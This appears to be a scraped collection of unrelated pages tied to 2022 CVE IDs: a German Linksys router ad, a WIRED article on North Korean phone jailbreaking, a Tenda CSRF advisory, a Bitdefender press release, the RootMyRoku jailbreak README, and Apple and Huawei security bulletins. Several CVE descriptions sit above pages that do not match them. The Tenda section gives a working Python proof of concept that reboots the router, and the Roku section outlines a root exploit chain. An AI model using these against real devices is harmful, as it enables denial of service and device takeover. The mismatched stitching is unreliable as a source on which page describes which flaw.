Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share.

**Merkmale**

**Die Zukunft beginnt mit der Intelligent Mesh™-Technologie und WiFi 6 jetzt schon.**

Der Linksys MR9600 ist ein extrem leistungsstarker Dual-Band WiFi 6 Router – perfekt für all diejenigen, die sich echte Gigabit-Geschwindigkeiten, eine höhere Reichweite und überall zu Hause genug Power zum Gamen wünschen. Mit Linksys Intelligent Mesh™-Technologie und Datenübertragungsraten von 6 Gbit/s ist er 4x schneller als WiFi 5 Router, verhindert Funklöcher und isoliert Ihr Netzwerk, um Störungen zu vermeiden. Mit diesem zukunftssicheren Router können Sie Ihr Netzwerk bei Bedarf erweitern, indem Sie Produkte hinzufügen, die mit dem Mesh-System von Linksys kompatibel sind. Mit der Linksys App lässt sich der MR9600 mühelos einrichten, sodass Sie in wenigen Minuten 8K-Videos streamen können.

**Mehr Kapazität für mehr Geräte**

WiFi 6 sendet und empfängt mehrere Datenströme gleichzeitig und sorgt für eine 4-mal höhere WLAN-Kapazität, um jedem Mobil-, Streaming-, Gaming- und Smart-Home-Gerät in Ihrem Netzwerk gerecht zu werden.

**Keine Funklöcher mehr**

Intelligent Mesh™-Technologie sorgt in Kombination mit WiFi 6 überall bei Ihnen Zuhause für WLAN-Geschwindigkeiten im Gigabit-Bereich – auch im Garten und auf Smart-Home-Geräten im Außenbereich.

**EINFACHE EINRICHTUNG UND BEDIENUNG**

Über die Linksys App erfolgt das Setup im Nu und Sie können von überall aus einfach auf Ihr Netzwerk zugreifen. Es ist zudem möglich, einzustellen, welche verbundenen Geräte die höchste Bandbreite im WLAN erhalten.

**Verringert WLAN-Überlastung**

Verhindert mithilfe der technisch ausgereiften WiFi 6-Technologie, die Ihr Netzwerk isolieren, Überlastung reduzieren und für das stärkste, klarste WLAN-Signal sorgen kann, Störungen durch benachbarte Netzwerke.

**Smartere Sicherheitsfunktionen**

Ihr Netzwerk ist dank der automatischen Software-Updates, Kinderschutzfunktionen und separatem Gastzugriff immer sicher und auf dem neuesten Stand.

**100 % abwärtskompatibel**

Funktioniert mit allen vorhandenen WLAN-fähigen Geräten wie Tablets, Laptops, Smart-Home- und Streaming-Geräten.

**Linksys App**

**Jederzeit und von überall aus haben Sie Ihr WLAN zu Hause voll im Griff**

Die Linksys App bietet Ihnen über Ihr Smartphone oder Tablet Remote-Zugriff auf Ihr WLAN zu Hause, sodass Sie es immer kontrollieren und verwalten können.

*   **Gastzugriff:** Richten Sie ein separates, passwortgeschütztes WLAN-Netzwerk für bis zu 50 Gäste ein und teilen Sie ihnen das Passwort bequem mit.
*   **Kinderschutzfunktionen:** Sorgen Sie für einen geschützten Internetzugang Ihrer Kinder, auch wenn Sie nicht vor Ort sind. Beschränken Sie den Zugang zu unangemessenen Inhalten oder Websites, die ablenken könnten, kontrollieren Sie die Nutzung und blockieren Sie den Internetzugang bestimmter Geräte.
*   **Gerätepriorisierung:** Geben Sie den Geräten, die die höchste Geschwindigkeit benötigen, den Vorrang.
*   **Geschwindigkeitstest:** Die Geschwindigkeit Ihrer Internetverbindung lässt sich einfach überprüfen und kontrollieren.

**Schnelles und einfaches Setup**

Die Verwaltung Ihres WLANs zu Hause erfolgt mit der Linksys App schnell und einfach:

 

****Laden Sie die Linksys App herunter****

 

 

****Stellen Sie eine Verbindung mit Ihrem Modem her****

 

****Geben Sie Ihrem WLAN einen Namen und erstellen Sie ein Passwort****

CVE-2022-24372: Linksys Dual-Band Mesh-WLAN WiFi 6 Router (MR9600)

A new report suggests that a small but vibrant group of smartphones hackers may be challenging the world's most digitally restrictive regime.

For most of the world, the common practice of "rooting" or "jailbreaking" a phone allows the device's owner to install apps and software tweaks that break the restrictions of Apple’s or Google's operating systems. For a growing number of North Koreans, on the other hand, the same form of hacking allows them to break out of a far more expansive system of control—one that seeks to extend to every aspect of their lives and minds.

On Wednesday, the North Korea-focused human rights organization Lumen and Martyn Williams, a researcher at the Stimson Center think tank's North Korea–focused 38 North project, together released a report on the state of smartphones and telecommunications in the Democratic People's Republic of Korea, a country that restricts its citizens' access to information and the internet more tightly than any other in the world. The report details how millions of government-approved, Android-based smartphones now permeate North Korean society, though with digital restrictions that prevent their users from downloading any app or even any file not officially sanctioned by the state. But within that regime of digital repression, the report also offers a glimpse of an unlikely new group: North Korean jailbreakers capable of hacking those smartphones to secretly regain control of them and unlock a world of forbidden foreign content.

"There has been a sort of constant battle between the North Korean government and its citizens over use of technology: Each time a new technology has been introduced, people have usually found a way to use it for some illicit purpose. But that hasn't really been done through this kind of hacking—until now," says Williams. "In terms of the future of free information in North Korea, it shows that people are still willing to try to break the government's controls."

Learning anything about the details of subversive activity in North Korea—digital or otherwise—is notoriously difficult, given the Hermit Kingdom's nearly airtight information controls. Lumen's findings on North Korean jailbreaking are based on interviews with just two defectors from the country. But Williams says the two escapees both independently described hacking their phones and those of other North Koreans, roughly corroborating each others' telling. Other North Korea–focused researchers who have interviewed defectors say they've heard similar stories.

Both jailbreakers interviewed by Lumen and Williams said they hacked their phones—government-approved, Chinese-made, midrange Android phones known as the Pyongyang 2423 and 2413—primarily so that they could use the devices to watch foreign media and install apps that weren't approved by the government. Their hacking was designed to circumvent a government-created version of Android on those phones, which has for years included a certificate system that requires any file downloaded to the device to be "signed" with a cryptographic signature from government authorities, or else it's immediately and automatically deleted. Both jailbreakers say they were able to remove that certificate authentication scheme from phones, allowing them to install forbidden apps, such as games, as well as foreign media like South Korean films, TV shows, and ebooks that North Koreans have sought to access for decades despite draconian government bans.

In another Orwellian measure, Pyongyang phones' government-created operating system takes screenshots of the device at random intervals, the two defectors say—a surveillance feature designed to instill a sense that the user is always being monitored. The images from those screenshots are then kept in an inaccessible portion of the phone's storage, where they can't be viewed or deleted. Jailbreaking the phones also allowed the two defectors to access and wipe those surveillance screenshots, they say.

The two hackers told Lumen they used their jailbreaking skills to remove restrictions from friends' phones, as well. They said they also knew of people who would jailbreak phones as a commercial service, though often for purposes that had less to do with information freedom than more mundane motives. Some users wanted to install a certain screensaver on their phone, for instance, or wipe the phone's surveillance screenshots merely to free up storage before selling the phone secondhand.

One of the two jailbreakers, by contrast, said he was motivated in part by the same kind of mentality that drives some hackers in the West, according to Sokeel Park, the country director for Liberty in North Korea, who also spoke with the same defector who was interviewed by Lumen. "There isn't necessarily a super rational reason for this kind of hacking," says Park. "It's just like, doing stuff because you _can_, playing this cat-and-mouse game to test your own abilities."

Exactly what technical methods the two hackers used to defy their devices' restrictions is far from clear, given their limited, secondhand accounts. But both described attaching phones to a Windows PC via a USB cable to install a jailbreaking tool. One mentioned that the Pyongyang 2423’s software included a vulnerability that allowed programs to be installed in a hidden directory. The hacker says they exploited that quirk to install a jailbreaking program they'd downloaded while working abroad in China and then smuggled back into North Korea. The other hacker didn't make clear the source of his jailbreaking tool, but said he had been a student in a computer science group at Pyongyang's elite Kim Il Sung University.

The hackers Lumen describes are broadly representative of the two emerging classes of people jailbreaking phones in North Korea, says Nat Kretchun, the vice president for programs at the Open Technology Fund and a longtime researcher of North Korean media and technology. "There are the folks who come out of Kim Il Sung University or Kim Chaek University or part of the North Korean state who are essentially building these tools and doing kind of cheeky things on the side to allow themselves a little bit of room to undo the things that they implemented themselves," says Kretchun, who has independently interviewed several North Korean jailbreakers. "Then there's this other class of folks who have some amount of computer science literacy and are spending so much time with the phones that they're basically mapping out exactly how the thing works in practice and finding pretty clever work-arounds."

Kretchun and other researchers say that the number of jailbreakers remains fairly small, given the rarity of computer literacy in the country and the difficulty of sharing the tools. Changes to North Korean phones to disable their USB connections may have made jailbreaking even more of a challenge, says 38 North's Williams. But he points to a new law implemented in late 2020 that forbids "illegally installing a phone manipulation program" and includes a fine for possessing a smartphone without safeguards designed to block "impure publications," as the law puts it.

"While it is difficult to estimate the number of North Koreans modifying their phones, and interviewees did not seem to think the practice was widespread," reads Lumen's report, "the existence of this specific wording would imply it is happening at a scale where authorities are aware and potentially concerned."

Despite the relatively small scale of jailbreaking in the DPRK, Liberty in North Korea’s Sokeel Park argues that even a small community of phone hackers represents a sign that North Koreans have the will to fight against government controls. He adds that jailbreakers elsewhere in the world should perhaps focus their efforts on building and distributing hacking tools designed to help them.

"I think it's a very obvious call to action for the international community of technologists," Park says. "There is a dynamism there. This kind of hacking shows North Koreans are not passive subjects of oppression and surveillance and censorship. North Korean people are creating solutions and work-arounds so that they can learn things that the North Korean government doesn't want them to learn, sharing things the government considers subversive, and ultimately so they can create a challenge to the regime."

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

North Koreans Are Jailbreaking Phones to Access Forbidden Media

Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via the function sub_422168 at /goform/WifiExtraSet.

Affect device: Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

The vulnerability exists in the sub\_422168 function.

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

**POC**

import requests

url \= "http://192.168.158.149/goform/WifiExtraSet"

r \= requests.post(url)
#r = requests.get(url) also can do
print(r.content)

CVE-2022-27375: myCVE/AX12-2.md at main · tianhui999/myCVE

New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private Web browsing.

BUCHAREST, Romania and SANTA CLARA, Calif., April 21, 2022 -- Bitdefender, a global cybersecurity leader, today announced new enhancements to its Bitdefender Premium Virtual Private Network (VPN) Service designed to bolster privacy, identity protection and security for consumers. New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private web browsing from anywhere in the world using a computer or mobile device. It is simple to set up and comes with an intuitive interface for any level user.

Cybersecurity and data privacy are converging as consumers grow increasingly concerned about who has access to their personally identifiable information, as well as data collected about their online activities and how that data is sold, traded and used. Even when consumers use so-called "Private Browsing" or "Incognito" modes on major web browsers, internet service providers (ISPs), wireless hotspots and websites often still collect information about their browsing history and online behavior.

Data tracking, spyware and other malicious threats are still a reality on open public Wi-Fi networks. According to Firefox telemetry, about 80 percent of web traffic globally is encrypted. Additionally, a study found that about six percent of the top 10,000 websites secured by HTTPS had TLS protocol security flaws.

Recent Bitdefender research revealed that most consumers are highly exposed to risk, with the majority (61 percent) not using VPN services and anti-trackers, ad blockers (44 percent) or privacy software of any type (64 percent) on the personal devices they use most for online activities.

"It has become increasingly difficult for consumers to maintain privacy and keep their data secure as they conduct their digital lives online," said Ciprian Istrate, vice president, Bitdefender Consumer Solutions. "We incorporated ad blocking and anti-tracking capabilities to Bitdefender Premium VPN to deliver both solid protection and anonymity as users enjoy favorite online activities without concern their online behaviors are being tracked or personal data collected and sold either legally or illegally."

**Bitdefender Premium VPN Key Features**

*   **Powerful Encryption for All Web Traffic** \-- Securely encrypt all incoming and outgoing web traffic for Windows, Mac, Android and iOS devices leveraging over 4,000 Bitdefender VPN servers across 49 countries. Keep online identities and activities safe from hackers, ISPs and others for safe online streaming and downloads, with no traffic logs.
*   **Built-In Ad Blocker for Better Browsing Experience** \-- Native ad blocker module removes ads, banners, pop-ups and video ads from websites for a better browsing experience. Blocking intrusive ads reduces the risk of adware and malware, and helps users save bandwidth while reclaiming the entire screen for relevant content only.
*   **Prevent Online Profiling With Anti-Tracker --** Block advertisers, websites and other third-parties from collecting data such as device type, location, web queries, shopping preferences and more. Preventing the collection of such data not only protects consumer privacy, it can speed performance of users' devices.
*   **Achieve System-Wide Protection --** As opposed to web browser extensions that only offer privacy within that browser, Bitdefender VPN Premium blocks disrupting ads and tracking modules across the user's entire device without slowing down systems or leaving gaps in defense.
*   **Whitelist Trusted Websites --** Easily make exceptions to ad blocking and anti-tracking features as desired, by adding the URLs of specific, trusted domains to a whitelist. This enables VPN users to ensure secure, encrypted browsing while accessing websites that might otherwise not load properly when tracking codes are blocked.

**Availability**

Bitdefender Premium VPN is available for Windows, macOS, Android and iOS devices. New ad blocker, anti-tracker and whitelist capabilities are now available to all users, including free and trial customers. For more information or to purchase Bitdefender Premium VPN visit https://www.bitdefender.com/solutions/vpn.html.

**About Bitdefender**

Bitdefender provides cybersecurity solutions with leading security efficacy, performance and ease of use to small and medium businesses, mid-market enterprises and consumers. Guided by a vision to be the world's most trusted cybersecurity solutions provider, Bitdefender is committed to defending organizations and individuals around the globe against cyberattacks to transform and improve their digital experience. For more information, visit https://www.bitdefender.com.

Bitdefender Enhances Premium VPN Service With New Privacy Protection Technologies

Roku devices running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable to Arbitrary file modification.

**Root My Roku**

A persistent root jailbreak for RokuOS v9.4.0 build 4200 devices using a Realtek WiFi chip.  
A big thank you to ammar2 and popeax from the Exploitee.rs Discord for helping discover and develop this.

**Features**

*   Spawns a telnet server running as root on port 8023.
*   Enables the low-level hardware developer mode.
*   Adds many new secret screens and debug features to the main menu.
*   _Blocks channel updates, firmware updates, and all communication with Roku servers._

**Usage**

1.  Download any new channels you might want to use after the jailbreak.  
    Once you jailbreak your device, all communication with Roku's servers will be blocked.  
    Any channels you currently have installed should continue to work.  
    Please see the F.A.Q. below for details.
2.  Enable Developer Settings on your Roku device.
3.  Download the latest dev-channel.zip from the releases page.
4.  Upload dev-channel.zip using the guide from the previous step.
5.  Follow the prompts on screen, then reboot to jailbreak!

**Applications**

*   Using a Roku TV to drive ambient lighting: https://www.youtube.com/watch?v=V\_enynuw-rc (details).

**F.A.Q.****Which devices does this affect?**

Affected devices include _almost all_ Roku TVs and some Roku set-top boxes.  
In theory, any Roku device running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable.  
You can check your current software version from Settings -> System -> About.  
While it is not possible to manually check your WiFi chip manufacturer, the channel provided for this exploit will tell you if your device is vulnerable or not.

**Can this brick my device?**

No! It makes no changes to the underlying firmware that the device runs.  
If anything bad happens, a factory reset will always recover your device.

**How do I un-jailbreak my device?**

You have two options:

*   Factory reset your device. This will clear NVRAM and remove the jailbreak.
*   Using the telnet server on port 8023, delete /nvram/udhcpd-p2p.conf and reboot.

**Is Roku aware of this exploit?**

Some of the critical components required for the exploit chain no longer work in RokuOS v10.  
The NFS mount option that is used for arbitrary file modification gets disabled, and the service used for persistence and privilege escalation is no longer used.

While RokuOS v10 has started rolling out, many devices have not received the update yet.

**Why does the jailbreak block communication with Roku servers?**

This is a precautionary measure to prevent the jailbreak from being disabled or removed.  
In the past, Roku has taken some _creative_ measures to forcefully patch jailbroken devices. One such example was an update to the screensaver channel that would check for a telnet service, connect to it, and command it to un-root and update the device.

Unfortunately, the servers used for channel and firmware updates the same ones used to communicate with Roku in general. Blocking updates means that no new channels can be installed and that certain features like "My Feed" and "Search" will no longer work.  
Applications that communicate with other services (e.g. YouTube, Netflix, HBO) will still work.

**How can I prevent my non-jailbroken Roku from updating?**

Edit your modem/router's DNS settings to use the IP address of dns.rootmyroku.com.  
You can find the current IP address using nslookup, dig, or online DNS lookup tools.

**Why should I trust the code you execute on my device?**

You don't have to!

All of the files required to reproduce this exploit are available in this repo:

*   The local channel used to load the remote payload is available under local.
*   The remote payload loaded over NFS is available under remote.
*   The script used to create the NFS and DNS servers are available under server.

**Exploit Details**

There's two main vulnerabilities that make this exploit possible: arbitrary file modification and privilege escalation.

RokuOS actually does a decently good job at sandboxing channels to prevent them from accessing the underlying filesystem. In addition to running as a restricted user, a software sandbox, and a chroot jail, Roku's Linux kernel has grsecurity patches applied. These patches mitigate common exploit techniques used in jailbreaks and privilege escalation. Furthermore, the entire root filesystem is read-only and baked into the firmware. Only persistent storage (NVRAM) and temp directories are writable.

**Arbitrary File Modification**

Two things conspired to allow arbitrary file modification. The first was that an undocumented pkg_nfs_mount channel manifest option. This option was meant to reduce the software development lifecycle when creating a channel by allowing the channel's source code to be hosted on a different machine using NFS. This removes the need to re-package and re-upload channels after every code change.  
The second was a shortcoming of the grsecurity patches and the Linux kernel in general: symlinks over NFS act weird. While grsecurity was configured specifically to not allow symlinking to directories owned by other users, the ownership and permission checks no longer work properly when the symlink resides on an NFS mount. This allows us to create a symlink in the remote channel's package that points to the root of the main filesystem. (See remote/source/Main.brs for details.)  
This provided us with the ability to modify persistent storage and temp files, but only as the app user.

**Privilege Escalation**

From there, we discovered that the process that configures udhcpd (a DHCP service used for pairing speakers and remotes) for Realtek chipsets could be made to read a config file from NVRAM, a location that the app user has access to. If we could leverage it properly, it would let us manipulate a service running as the root user and also give us a means of persisting across reboots. Thankfully, udhcpd has an option for executing a script (notify_file) with a single parameter (lease_file) whenever a DHCP lease is created. It wasn't perfect though: the udhcpd service would only run the script if it has the "execute" bit set. While we could create arbitrary files using our previous exploit, we didn't have control over the file's permissions and as a result, none of the payload scripts we create are marked as executable. To make matters more difficult, we couldn't pass the payload script as lease_file to the built-in shell executables because udhcpd would overwrite the script contents first.  
Ultimately, the solution involved creating a lease_file value polyglot that is both an AWK script and a legal file name. (See remote/bootstrap.conf for details.)

**Footnote**

If anyone at Roku is reading this: you desperately need a _real_ bug bounty program.

Without one, there's little incentive to research and report vulnerabilities when you're not sure if you'll be rewarded for your efforts or not. While we took this project on for fun as a hobby, almost no professional security researchers are going to dedicate as much effort as we did for a "maybe".

CVE-2022-27152: GitHub - llamasoft/RootMyRoku: A persistent root jailbreak for most Roku devices.

jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

CVE-2022-28796

A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.

Released March 14, 2022

**Accelerate Framework**

Available for: macOS Monterey

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22669: an anonymous researcher

**AppKit**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22631: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: An application may be able to read restricted memory

Description: This issue was addressed with improved checks.

CVE-2022-22648: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro

CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro

**BOM**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**curl**

Available for: macOS Monterey

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating to curl version 7.79.1.

CVE-2021-22946

CVE-2021-22947

CVE-2021-22945

Entry updated March 21, 2022

**FaceTime**

Available for: macOS Monterey

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab

**IOGPUFamily**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: macOS Monterey

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**libarchive**

Available for: macOS Monterey

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**Login Window**

Available for: macOS Monterey

Impact: A person with access to a Mac may be able to bypass Login Window

Description: This issue was addressed with improved checks.

CVE-2022-22647: an anonymous researcher

**LoginWindow**

Available for: macOS Monterey

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22656

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-22657: Brandon Perry of Atredis Partners

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22664: Brandon Perry of Atredis Partners

**NSSpellChecker**

Available for: macOS Monterey

Impact: A malicious application may be able to access information about a user's contacts

Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.

CVE-2022-22644: an anonymous researcher

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22617: Mickey Jin (@patch1t)

**Preferences**

Available for: macOS Monterey

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**QuickTime Player**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-22650: Wojciech Reguła (@\_r3ggi) of SecuRing

**Safari Downloads**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**Sandbox**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**Siri**

Available for: macOS Monterey

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)

**SMB**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22651: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey Jin (@patch1t)

**System Preferences**

Available for: macOS Monterey

Impact: An app may be able to spoof system notifications and UI

Description: This issue was addressed with a new entitlement.

CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**UIKit**

Available for: macOS Monterey

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**Vim**

Available for: macOS Monterey

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

CVE-2022-0156

CVE-2022-0158

**VoiceOver**

Available for: macOS Monterey

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2021-30918: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Monterey

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

**xar**

Available for: macOS Monterey

Impact: A local user may be able to write arbitrary files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2022-22582: Richard Warren of NCC Group

CVE-2022-22665: About the security content of macOS Monterey 12.3

There is an incorrect buffer size calculation vulnerability in the video framework.Successful exploitation of this vulnerability may affect availability.

HUAWEI is releasing monthly security updates for flagship models. This security update includes HUAWEI and third-party library patches:

This security update includes the following third-party library patches:

This security update includes the CVE announced in the February 2022 Android security bulletin:

Critical: none

High: CVE-2020-13112, CVE-2020-13113, CVE-2021-39619, CVE-2021-39663, CVE-2021-39666, CVE-2021-39669, CVE-2021-39674, CVE-2021-39676, CVE-2021-39631, CVE-2021-35068, CVE-2021-35074, CVE-2021-35075, CVE-2021-35077, CVE-2021-35069

Medium: CVE-2021-30324, CVE-2021-30325

Low: none

Already included in previous updates: CVE-2021-39626, CVE-2021-39633, CVE-2021-39634, CVE-2021-0775, CVE-2021-1027, CVE-2021-1028, CVE-2021-1029, CVE-2021-0759, CVE-2021-0852

※ For more information on security patches, please refer to the Android security bulletins (https://source.android.com/security/bulletin).

This security update includes the following HUAWEI patches:

CVE-2021-40054: Integer underflow vulnerability in the atcmdserver module

Severity: High

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect integrity.

CVE-2021-40047: Vulnerability of memory not being released after effective lifetime in the Bastet module

Severity: High

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect integrity.

CVE-2021-40053: Permission control vulnerability in the Nearby module

Severity: Medium

Affected versions: EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability will affect availability and integrity.

CVE-2021-40052: Incorrect buffer size calculation vulnerability in the video framework

Severity: High

Affected versions: EMUI 11.0.1, EMUI 11.0.0, Magic UI 4.0.0

